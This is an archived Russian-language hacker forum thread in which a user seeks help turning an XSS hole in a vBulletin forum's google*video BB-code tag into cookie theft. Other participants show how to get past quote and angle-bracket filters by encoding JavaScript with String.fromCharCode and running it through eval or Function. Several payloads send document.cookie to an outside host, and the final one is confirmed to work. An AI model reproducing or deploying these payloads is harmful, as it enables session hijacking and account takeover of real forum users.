Снова JS и кавычки [Архив]

Просмотр полной версии : Снова JS и кавычки

Seller Zeus

10.02.2014, 14:56

Добрый день всем. Такой вопрос.

Есть xss на булке из за тега google*video.

[google*video][U*RL=/onmouseover=document.location.href = 'http://site.net/snf/s.gif?'+document.cookie;a="]1[/U*RL]123[/google*video]

Алерт с куками вылетает на ура, теперь вопрос.

Фильтруются кавычки ' " и `

Как быть в данной ситуации?

XAMEHA

10.02.2014, 15:10

А в чем проблема?

Code:
eval(String.fromCharCode(84, 69, 83, 84))

// Фильтр на eval:

Function(String.fromCharCode(84, 69, 83, 84))()

Seller Zeus

10.02.2014, 15:55

Спасибо, а как с тегом прописать ? я что то не догоняю

Seller Zeus

10.02.2014, 18:00

Дайте encoder Хотябы(

Inoms

10.02.2014, 19:05

Seller Zeus said:
Дайте encoder Хотябы(

https://www.martineve.com/2007/05/23/string-fromcharcode-encoder/

Seller Zeus

10.02.2014, 19:31

Inoms said:
https://www.martineve.com/2007/05/23/string-fromcharcode-encoder/

Спасибо большое

Seller Zeus

10.02.2014, 20:14

Чет не получается.

Зашифровал это место:

document.location.href = 'http://site.net/snf/s.gif?'+document.cookie

Получилось:

eval(String.fromCharCode(102,117,110,99,116,105,11 1,110,32,101,110,99,111,100,101,95,116,111,95,106, 97,118,97,115,99,114,105,112,116,40,41,32,123,32,1 18,97,114,32,105,110,112,117,116,32,61,32,100,111, 99,117,109,101,110,116,46,103,101,116,69,108,101,1 09,101,110,116,66,121,73,100,40,39,105,110,112,117 ,116,116,101,120,116,39,41,46,118,97,108,117,101,5 9,32,118,97,114,32,111,117,116,112,117,116,32,61,3 2,39,101,118,97,108,40,83,116,114,105,110,103,46,1 02,114,111,109,67,104,97,114,67,111,100,101,40,39, 59,32,102,111,114,40,112,111,115,32,61,32,48,59,32 ,112,111,115,32,60,32,105,110,112,117,116,46,108,1 01,110,103,116,104,59,32,112,111,115,43,43,41,32,1 23,32,111,117,116,112,117,116,32,43,61,32,105,110, 112,117,116,46,99,104,97,114,67,111,100,101,65,116 ,40,112,111,115,41,59,32,105,102,40,112,111,115,32 ,33,61,32,40,105,110,112,117,116,46,108,101,110,10 3,116,104,32,45,32,49,41,41,32,123,32,111,117,116, 112,117,116,32,43,61,32,34,44,34,59,32,125,32,125, 32,111,117,116,112,117,116,32,43,61,32,39,41,41,39 ,59,32,100,111,99,117,109,101,110,116,46,103,101,1 16,69,108,101,109,101,110,116,66,121,73,100,40,39, 114,101,115,117,108,116,39,41,46,105,110,110,101,1 14,72,84,77,76,32,61,32,111,117,116,112,117,116,59 ,32,114,101,116,117,114,110,32,48,59,32,125))

Вставил:

[google*video][U*RL=/onmouseover=eval(String.fromCharCode(102,117,110,9 9,116,105,111,110,32,101,110,99,111,100,101,95,116 ,111,95,106,97,118,97,115,99,114,105,112,116,40,41 ,32,123,32,118,97,114,32,105,110,112,117,116,32,61 ,32,100,111,99,117,109,101,110,116,46,103,101,116, 69,108,101,109,101,110,116,66,121,73,100,40,39,105 ,110,112,117,116,116,101,120,116,39,41,46,118,97,1 08,117,101,59,32,118,97,114,32,111,117,116,112,117 ,116,32,61,32,39,101,118,97,108,40,83,116,114,105, 110,103,46,102,114,111,109,67,104,97,114,67,111,10 0,101,40,39,59,32,102,111,114,40,112,111,115,32,61 ,32,48,59,32,112,111,115,32,60,32,105,110,112,117, 116,46,108,101,110,103,116,104,59,32,112,111,115,4 3,43,41,32,123,32,111,117,116,112,117,116,32,43,61 ,32,105,110,112,117,116,46,99,104,97,114,67,111,10 0,101,65,116,40,112,111,115,41,59,32,105,102,40,11 2,111,115,32,33,61,32,40,105,110,112,117,116,46,10 8,101,110,103,116,104,32,45,32,49,41,41,32,123,32, 111,117,116,112,117,116,32,43,61,32,34,44,34,59,32 ,125,32,125,32,111,117,116,112,117,116,32,43,61,32 ,39,41,41,39,59,32,100,111,99,117,109,101,110,116, 46,103,101,116,69,108,101,109,101,110,116,66,121,7 3,100,40,39,114,101,115,117,108,116,39,41,46,105,1 10,110,101,114,72,84,77,76,32,61,32,111,117,116,11 2,117,116,59,32,114,101,116,117,114,110,32,48,59,3 2,125));a="]1[/U*RL]123[/goole*video]

Но не работает, почему?

Подскажите плиз

Seller Zeus

11.02.2014, 11:53

Где я ошибся?

Seller Zeus

11.02.2014, 14:13

Такой код:

[g*ooglevideo][UR*L=/onmouseover=String.fromCharCode(105,109,103,61,110 ,101,119,32,73,109,97,103,101,40,41,59,105,109,103 ,46,115,114,99,61,39,104,116,116,112,58,47,47,107, 114,105,114,109,105,110,97,108,97,46,110,101,116,4 7,115,110,102,47,115,46,103,105,102,63,39)+documen t.cookie;a="]1[/UR*L]123[/g*ooglevideo]

Открывает пустую страницу с таким содержимым:

img=new Image();img.src='http://site.net/snf/s.gif?'ibPAcookiecheck=yesss; bblastvisit=1391747746; bblastactivity=0; bbforum_view=f6e2fa0437c99cf04b4bc96c8e0bd82378a10 a68a-1-%7Bi-13_i-1392013111_%7D

Как надо написать правильно чтобы он все же создавал картинку?

Img запишнул в str так как пробелы тоже не допускаются, а переменная создается только с пробелом.

psihoz26

11.02.2014, 16:51

попробуй кормить скрипту ссылку на js файл в котором и будет нужный код

Seller Zeus

11.02.2014, 20:56

psihoz26 said:
попробуй кормить скрипту ссылку на js файл в котором и будет нужный код

Через document.location.href?

psihoz26

12.02.2014, 16:23

Seller Zeus said:
Через document.location.href?

Зачем?

http://example.com/script.js замени на адрес своего js файла

Seller Zeus

12.02.2014, 16:24

psihoz26 said:
Зачем?

http://example.com/script.js замени на адрес своего js файла

угловые скобки фильтруются...

Inoms

12.02.2014, 19:15

А на это как реагирует ?

Code:
onmouseover=document.write(String.fromCharCode(60, 115,99,114,105,112,116,62,105,109,103,61,110,101,1 19,32,73,109,97,103,101,40,41,59,105,109,103,46,11 5,114,99,61,34,104,116,116,112,58,47,47,107,114,10 5,114,109,105,110,97,108,97,46,110,101,116,47,115, 110,102,47,115,46,103,105,102,63,34,43,100,111,99, 117,109,101,110,116,46,99,111,111,107,105,101,59,6 0,47,115,99,114,105,112,116,62));

ЗЫ: Там

Code:
img=new Image();img.src="http://krirminala.net/snf/s.gif?"+document.cookie;

Seller Zeus

13.02.2014, 18:11

Inoms said:
А на это как реагирует ?

Code:
onmouseover=document.write(String.fromCharCode(60, 115,99,114,105,112,116,62,105,109,103,61,110,101,1 19,32,73,109,97,103,101,40,41,59,105,109,103,46,11 5,114,99,61,34,104,116,116,112,58,47,47,107,114,10 5,114,109,105,110,97,108,97,46,110,101,116,47,115, 110,102,47,115,46,103,105,102,63,34,43,100,111,99, 117,109,101,110,116,46,99,111,111,107,105,101,59,6 0,47,115,99,114,105,112,116,62));

ЗЫ: Там

Code:
img=new Image();img.src="http://site.net/snf/s.gif?"+document.cookie;

Спасибо, а как сделать чтобы на пустую страницу не редеректило?

Inoms

13.02.2014, 20:26

document.write убрать и далее снова перекодировать js, без тегов script и собственно, евалить. Но в этом случаи, как ранее говорилось, запрос придёт в негодность ?

Seller Zeus

13.02.2014, 20:28

Inoms said:
document.write убрать и далее снова перекодировать js, без тегов script и собственно, евалить. Но в этом случаи, как ранее говорилось, запрос придёт в негодность ?

Ну так он и щас без тегов script.

Inoms

13.02.2014, 20:31

Эти теги закатаны в String.fromCharCode и далее записываются на страницу.

Seller Zeus

13.02.2014, 20:32

Inoms said:
Эти теги закатаны в String.fromCharCode и далее записываются на страницу.

Вообщем вы предлагаете вместо document.write написать eval(); ?

Inoms

13.02.2014, 20:42

Если этого не сделать, всё то, что вернет String.fromCharCode будет текст, который даже нигде не будет показан)

Seller Zeus

13.02.2014, 20:43

Inoms said:
Если этого не сделать, всё то, что вернет String.fromCharCode будет текст, который даже нигде не будет показан)

Спасибо что разъяснили, сейчас попробую)

Seller Zeus

18.02.2014, 16:58

Если заменить document.write на eval то не уходят куки.

Как сделать правильно? чтобы новая страница не открывалась и код выполнился?

Seller Zeus

19.02.2014, 18:04

Подскажите плиз, весь гугл перерыл, не нашел

Inoms

19.02.2014, 20:43

А сам код на странице присутствует ? или его с eval'ом выпиливает ?

Code:
eval(String.fromCharCode(105,109,103,61,110,101,11 9,32,73,109,97,103,101,40,41,59,105,109,103,46,115 ,114,99,61,34,104,116,116,112,58,47,47,107,114,105 ,114,109,105,110,97,108,97,46,110,101,116,47,115,1 10,102,47,115,46,103,105,102,63,34,43,100,111,99,1 17,109,101,110,116,46,99,111,111,107,105,101,59));

Если не выполнится, пробуйте так, как советовали вторым постом :

Code:
Function(String.fromCharCode(105,109,103,61,110,10 1,119,32,73,109,97,103,101,40,41,59,105,109,103,46 ,115,114,99,61,34,104,116,116,112,58,47,47,107,114 ,105,114,109,105,110,97,108,97,46,110,101,116,47,1 15,110,102,47,115,46,103,105,102,63,34,43,100,111, 99,117,109,101,110,116,46,99,111,111,107,105,101,5 9))();

Seller Zeus

25.02.2014, 19:13

Inoms said:
А сам код на странице присутствует ? или его с eval'ом выпиливает ?

Code:
eval(String.fromCharCode(105,109,103,61,110,101,11 9,32,73,109,97,103,101,40,41,59,105,109,103,46,115 ,114,99,61,34,104,116,116,112,58,47,47,107,114,105 ,114,109,105,110,97,108,97,46,110,101,116,47,115,1 10,102,47,115,46,103,105,102,63,34,43,100,111,99,1 17,109,101,110,116,46,99,111,111,107,105,101,59));

Если не выполнится, пробуйте так, как советовали вторым постом :

Code:
Function(String.fromCharCode(105,109,103,61,110,10 1,119,32,73,109,97,103,101,40,41,59,105,109,103,46 ,115,114,99,61,34,104,116,116,112,58,47,47,107,114 ,105,114,109,105,110,97,108,97,46,110,101,116,47,1 15,110,102,47,115,46,103,105,102,63,34,43,100,111, 99,117,109,101,110,116,46,99,111,111,107,105,101,5 9))();

Спасибо большое, 2 работает.